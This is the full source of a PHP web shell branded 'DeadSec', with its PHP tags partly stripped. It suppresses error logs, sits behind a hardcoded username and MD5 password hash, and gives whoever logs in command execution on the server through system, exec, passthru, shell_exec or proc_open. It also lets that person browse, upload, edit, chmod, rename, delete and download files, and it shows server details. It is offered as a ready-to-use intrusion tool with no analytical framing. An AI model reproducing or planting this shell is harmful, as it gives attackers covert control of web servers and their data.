@ini_set("error_log", NULL);@ini_set("log_errors", 0);@error_reporting(0);@error_log(false);@session_start();define("username", "DarXsec");define("passwd", "96be84a5ba486caf7e767bc6e2d97d7d");if (strtolower(substr(PHP_OS, 0, 3)) === "win") { $os = "Windows";} else { $os = "Linux";}function sanitize($str){ return filter_var(htmlspecialchars($str), FILTER_SANITIZE_FULL_SPECIAL_CHARS);}function login_shell(){<!DOCTYPE html><html lang="en"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0">LOGIN DeadSec <title>LOGIN DeadSec</title> <link href="https://fonts.googleapis.com/css2?family=Creepster&family=Caveat+Brush&display=swap" rel="stylesheet"> <link rel="shortcut icon" href="https://wallpapercave.com/wp/wp4020127.jpg" type="image/x-icon"><style> :root { --text-color: #fff; --text-red: rgb(255, 0, 0); --box-color: #202e62; --unactive: rgb(98, 98, 98); } * { margin: 0; padding: 0; } html { height: 100vh; width: 100%; } body { overflow: hidden; background-image: url(https://pomf2.lain.la/f/1jhntt0.jpg); background-color: black; background-size: cover; background-repeat: no-repeat; align-items: center; } .login-form { height: 100vh; width: 100%; position: inherit; box-sizing: border-box; display: flex; justify-content: center; align-items: center; flex-direction: column; } .logo { font-family: 'Creepster', cursive; color: var(--text-color); font-size: 50px; } .logo span { color: var(--text-red); } .login-box { width: 300px; background-color: var(--box-color); padding: 40px; margin-top: 10px; border-radius: 15px; box-shadow: 0px 3px 3px 0px rgba(0, 0, 0, 0.12), 0px 3px 6px 0px rgba(0, 0, 0, 0.22), 0px 5px 10px 0px rgba(0, 0, 0, 0.2), 0px 8px 12px 1px rgba(0, 0, 0, 0.19); display: flex; flex-direction: column; justify-content: center; align-items: center; } .login-box input { margin-top: 20px; border-radius: 5px; padding: 10px; border: 1px solid var(--unactive); background-color: var(--box-color); outline: none; color: var(--text-color); } .login-box .inputBox { position: relative; width: 100%; display: flex; flex-direction: column; } .inputBox span { color: var(--unactive); top: 20px; position: absolute; padding: 10px; pointer-events: none; transition: 300ms; } .login-box input:valid~span, .login-box input:focus~span { color: var(--text-color); transform: translateX(10px) translateY(-7px); font-size: 0.8em; padding: 0 10px; background: var(--box-color); } .submit { display: flex; justify-content: center; } .error { color: var(--text-red); } .quote { color: var(--text-color); font-family: 'Caveat Brush'; font-size: 25px; } .copyright { display: flex; justify-content: center; margin: 10px; font-family: 'caveat Brush'; color: var(--text-color); font-size: 20px; } .hidden { visibility: hidden; } @media only screen and (max-width: 480px) { body { background-image: url(https://wallpapercave.com/wp/wp4020127.jpg); } .login-box { width: calc(100vw - 100px); } .quote { font-size: 20px; } }</style> <div class="login-form"> <h1 class="logo">LOGIN<span> DeadSec</span> <div class="login-box"> <p class="quote">haha login first little bastard</p>
$login_error = '<p class="error">Wrong username or password.</p>'; if (isset($_POST["log"]) && $_POST["log"] === "login") { if (isset($_POST["username"]) && $_POST["username"] !== username || isset($_POST["password"]) && md5($_POST["password"]) !== passwd) { echo $login_error; } } <div class="inputBox"> <span>Username</span> </div> <div class="inputBox"> <span>Password</span> </div> <div class="submit"> </div>
</div> <div class="copyright"><span>&copy DeadSec 2023</span></div> </div>}function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); return $info;}function execute($cmd){ $cmd .= " 2>&1"; if (function_exists("system")) { @ob_start(); system($cmd); $stdout = @ob_get_contents(); @ob_end_clean(); } elseif (function_exists("exec")) { exec($cmd, $output); $stdout = @join("\n", $output); } elseif (function_exists("passthru")) { @ob_start(); passthru($cmd); $stdout = @ob_get_contents(); @ob_end_clean(); } elseif (function_exists("shell_exec")) { $stdout = shell_exec($cmd); } elseif (function_exists("proc_open")) { $stdout = ""; $std = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $handle = proc_open($cmd, $std, $pipes); if (is_resource($handle)) { if (function_exists("fread") && function_exists("feof")) { while (!feof($pipes[1])) { $stdout .= fread($pipes[1], 512); } } elseif (function_exists("fgets") && function_exists("feof")) { while (!feof($pipes[1])) { $stdout .= fgets($pipes[1], 512); } } } } else $stdout = "All executable function is disabled."; return $stdout;}function fsize($filepath){ if (is_file($filepath)) { $size = filesize($filepath); if ($size >= 1073741824) { $size = round($size / 1073741824, 2) . " GB"; } elseif ($size >= 1048576) { $size = round($size / 1048576, 2) . " MB"; } else { $size = round($size / 1024, 2) . " KB"; } return $size; }}function getint($int){ $num = 0; for ($i = strlen($int) - 1; $i >= 0; --$i) { $num += (int) $int[$i] * pow(8, (strlen($int) - $i - 1)); } return $num;}function forcedelete($path){ $path = (substr($path, -1) === "/") ? $path : $path . "/"; $dirs = @opendir($path); while (($item = @readdir($dirs)) !== false) { $item = $path . $item; if ((basename($item) === "..") || (basename($item) === ".")) { continue; } $type = @filetype($item); if ($type === "dir") { forcedelete($item); } else { @unlink($item); } } @closedir($dirs); return @rmdir($path);}function download($path){ if (file_exists($path)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($path) . '"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($path)); readfile($path); exit; }}function mini_shell(){<!DOCTYPE html><html lang="en"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0">Login To DeadSec <title>Login To DeadSec</title> <link rel="shortcut icon" href="https://wallpapercave.com/wp/wp4020127.jpg" type="image/x-icon"> <link href="https://fonts.googleapis.com/css2?family=Creepster&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Rubik+Vinyl&family=Caveat+Brush&display=swap" rel="stylesheet"><style> :root { --box-color: #6f00ff; --text-color: #fff; --red-text: rgb(255, 0, 0); --background-color: #000000; ---green-text: #00ff11; --back-hover: #2a2a2a; } * { margin: 0; padding: 0; box-sizing: border-box; } ::-webkit-scrollbar { width: 2px; } ::-webkit-scrollbar { background-color: transparent; height: 80px; } body { overflow-x: hidden; background-color: var(--background-color); color: var(--text-color); font-family: monospace; } .main { max-width: calc(100% - 10px); display: flex; align-items: center; flex-direction: column; } .logo { user-select: none; color: var(--text-color); font-family: 'Creepster'; padding: 10px; } .logo span { color: var(--red-text); } .header ul li { font-size: 0.8em; margin-left: 5px; } .header ul li span { color: var(---green-text); } .path { font-size: 0.8em; padding: 10px; white-space: normal; overflow-wrap: break-word; text-align: center; width: 80%; } .path a { text-decoration: none; color: var(---green-text); } .path a:hover { color: var(--text-color); } .file-upload { position: relative; cursor: pointer; overflow: hidden; } .file-upload input[type='file'] { color: var(---green-text); border: 1px solid var(--text-color); font-family: 'Caveat Brush'; border-radius: 4px; cursor: pointer; } .file-upload input[type='file']::-webkit-file-upload-button { background-color: transparent; color: var(--text-color); font-family: 'Caveat Brush'; text-transform: uppercase; cursor: pointer; border: none; } .file-upload button[type=submit] { background-color: var(--background-color); color: var(---green-text); border: 1px solid var(--text-color); padding: 3px; border-radius: 4px; cursor: pointer; text-transform: uppercase; font-family: 'Caveat Brush'; } .success { color: var(---green-text); } .error { color: var(--red-text); } .success, .error { margin: 5px; text-transform: uppercase; font-family: 'Caveat Brush'; } .current { color: var(--text-color); font-size: 0.8em; margin-top: 10px; overflow-wrap: break-word; text-align: center; } .current span { color: var(---green-text); } .filesource { width: calc(100% - 10px); border: 1px solid var(--text-color); border-radius: 5px; padding: 5px; background-color: var(--background-color); color: var(---green-text); margin-top: 10px; word-wrap: break-word; overflow-wrap: break-word; height: 420px; font-size: 0.8em; } .filesource::-webkit-scrollbar { width: 7px; } .filesource::-webkit-scrollbar-thumb { border-radius: 10px; height: 80px; background-color: var(--text-color); } .files { margin-top: 10px; border: 1px solid var(--text-color); width: calc(100vw - 20px); border-radius: 7px; font-size: 10px; } .files tr:hover { background-color: var(--back-hover); } .files tr th { padding: 6px; font-family: 'Caveat Brush'; font-weight: 100; font-size: 18px; } .files tr td { text-align: center; } .files tr td:nth-child(1) { max-width: 20vw; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; } .files tr td a { text-decoration: none; color: var(---green-text); } .files tr td a:hover { color: var(--text-color); } .files tr td:nth-child(4) { max-width: 20vw; } .files tr td select { background-color: var(--background-color); border: 1px solid var(--red-text); border-radius: 3px; color: var(--text-color); font-family: 'Caveat Brush'; } .files tr td button[type=submit] { background-color: var(--background-color); border: 1px solid var(--text-color); border-radius: 3px; color: var(--text-color); } .copyright { display: flex; justify-content: center; margin: 10px; } .action { margin: 5px; } .action input { background-color: var(--background-color); color: var(---green-text); border: 1px solid var(--text-color); border-radius: 3px; padding: 1px; outline: none; } .action button[type=submit] { background-color: var(--background-color); color: var(--text-color); border: 1px solid var(--text-color); border-radius: 3px; font-family: 'Caveat Brush'; text-transform: uppercase; } .fileedit { width: calc(100vw - 30px); margin: 0px 10px; margin-top: 1vh; min-height: 50vh; background-color: var(--background-color); color: var(--text-color); border: 1px solid var(---green-text); border-radius: 10px; } #edit { display: flex; flex-direction: column; justify-content: center; align-items: center; } #edit button { margin-top: 1vh; width: 10vw; background-color: var(--background-color); border: 1px solid var(--text-color); border-radius: 3px; color: var(---green-text); text-transform: uppercase; font-family: 'Caveat Brush'; }</style> <div class="main"> <div class="logo">

Welcome To<span> DeadSec Security</span>

</div> <div class="header"> <ul> <li>Uname: <span> echo Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64; </span></li> <li>Server IP: <span> echo isset($_SERVER["SERVER_ADDR"]) ? $_SERVER["SERVER_ADDR"] : "Unknown"; </span> | Your IP: <span> echo isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "Unknown"; </span></li> <li>PHP version: <span> echo phpversion(); </span></li> <li>Software: <span> echo isset($_SERVER["SERVER_SOFTWARE"]) ? $_SERVER["SERVER_SOFTWARE"] : "Unknown"; </span></li> </ul> </div> <div class="path"> <span>Current path:~$</span> if (isset($_GET["path"]) && file_exists($_GET["path"])) { $path = sanitize($_GET["path"]); } else $path = sanitize(getcwd()); $path = str_replace("\\", "/", $path); $paths = explode("/", $path); for ($i = 0; $i < count($paths); $i++) { if ($i === 0 && $paths[$i] === '') { echo "<a href=\"?path=/\">/</a>"; continue; } if ($paths[$i] === '') continue; echo "<a href=\"?path="; for ($x = 0; $x <= $i; $x++) { echo $paths[$x]; if ($x != $i) { echo "/"; } } echo "/\">" . $paths[$i] . "</a>/"; } </div>
<div class="file-upload"> <button type="submit">Submit</button> </div>
if (!is_readable($path)) echo "<div class=\"error\">Cannot read directory. (Not readable)</div>"; elseif (!is_writable($path)) echo "<div class=\"error\">Not writable path (RED DIR)</div>"; $upload_success = "<div class=\"success\"><span>File uploaded successfully.</span></div>"; if (isset($_FILES["fileUp"])) { if (function_exists("move_uploaded_file") && @move_uploaded_file($_FILES["fileUp"]["tmp_name"], $path . "/" . $_FILES["fileUp"]["name"])) { echo $upload_success; } elseif (function_exists("copy") && @copy($_FILES["fileUp"]["tmp_name"], $path . "/" . $_FILES["fileUp"]["name"])) { echo $upload_success; } else echo "<div class=\"error\"><span>Failed to upload.</span></div>"; } if (isset($_POST["option"]) && $_POST["option"] === "chmod" && isset($_POST["path"])) { if (isset($_POST["chmod"]) && @chmod($_POST["path"], getint($_POST["chmod"]))) { <div class="success">Permission changed successfully.</div> } elseif (isset($_POST["chmod"])) { <div class="error">Failed to change permission.</div> } <div class="action">
<span>Chmod: </span> <button type="submit">Submit</button>
</div> } elseif (isset($_POST["option"]) && $_POST["option"] === "rename" && isset($_POST["path"]) && isset($_POST["name"])) { if (isset($_POST["rename"]) && @rename($_POST["path"], $_POST["rename"])) { <div class="success">Success</div> } elseif (isset($_POST["rename"])) { <div class="error">Cannot rename file. An error occurred.</div> } <div class="action">
<span>Rename file: </span> <button type="submit">Submit</button>
</div> } elseif (isset($_POST["option"]) && $_POST["option"] === "delete" && isset($_POST["path"]) && isset($_POST["type"])) { if ($_POST["type"] === "dir") { if (forcedelete($_POST["path"])) { <div class="success">Directory deleted successfully.</div> } else { <div class="error">Failed to delete directory.</div> } } else { if (@unlink($_POST["path"])) { <div class="success">File deleted successfully.</div> } else { <div class="error">Failed to delete file.</div> } } } elseif (isset($_POST["option"]) && $_POST["option"] === "edit" && isset($_POST["path"])) { if (isset($_POST["content"]) && !is_dir($_POST["path"])) { $fopen = @fopen($_POST["path"], "w"); if (@fwrite($fopen, $_POST["content"])) { <div class="success">File edited successfully.</div> } else { <div class="error">Failed to edit file content.</div> } @fclose($fopen); }
<textarea name="content" id="" class="fileedit"> echo htmlentities(file_get_contents($_POST["path"]), ENT_QUOTES, 'UTF-8') </textarea> <button type="submit">Submit</button>
} if (isset($_GET["filesource"]) && file_exists($_GET["filesource"])) { echo "<div class=\"current\">File: <span>" . basename($_GET["filesource"]) . "</span></div>"; echo "<textarea class=\"filesource\" readonly>" . htmlentities(file_get_contents($_GET["filesource"]), ENT_QUOTES, 'UTF-8') . "</textarea>"; } elseif (is_readable($path)) { $scandir = @scandir($path); <table class="files"> <th>Name</th> <th>Size</th> <th>Permission</th> <th>Options</th> for ($i = 0; $i < count($scandir); $i++) { if (!is_dir($path . "/" . $scandir[$i]) || $scandir[$i] === "." || $scandir[$i] === "..") continue; <a href="?path= echo $path . "/" . $scandir[$i] . "/"; "> echo $scandir[$i]; </a> - $pathdir = $path . "/" . $scandir[$i]; if (is_writable($pathdir)) { echo "<font color=lime>"; } elseif (is_readable($pathdir)) { echo "<font color=grey>"; } else { echo "<font color=red>"; } echo perms($pathdir) . "</font>";
<select name="option" required> <option value="">Action</option> <option value="delete">Delete</option> <option value="chmod">Chmod</option> <option value="rename">Rename</option> </select> <button type="submit">>></button>
} for ($i = 0; $i < count($scandir); $i++) { $filepath = $path . "/" . $scandir[$i]; if (is_dir($filepath)) { continue; } <a href="?path= echo $path; &filesource= echo $filepath; "> echo $scandir[$i]; </a> echo fsize($filepath); if (is_writable($filepath)) { echo "<font color=lime>"; } elseif (is_readable($filepath)) { echo "<font color=grey>"; } else { echo "<font color=red>"; } echo perms($filepath) . "</font>";
<select name="option" required> <option value="">Action</option> <option value="edit">Edit</option> <option value="delete">Delete</option> <option value="chmod">Chmod</option> <option value="rename">Rename</option> <option value="download">Download</option> </select> <button type="submit">>></button>
} } </div> <div class="copyright"> <span>&copy DemonArmy</span> </div>}if (isset($_POST["log"])) { if ($_POST["log"] === "login") { if (isset($_POST["username"]) && $_POST["username"] === username && isset($_POST["password"]) && md5($_POST["password"]) === passwd) { $_SESSION["webshell"] = passwd; } } elseif ($_POST["log"] === "logout") { @session_destroy(); }}if (!isset($_SESSION["webshell"]) || $_SESSION["webshell"] !== passwd) { login_shell();} elseif (isset($_POST["option"]) && $_POST["option"] === "download" && isset($_POST["path"]) && !is_dir($_POST["path"])) { download($_POST["path"]);} else { mini_shell();}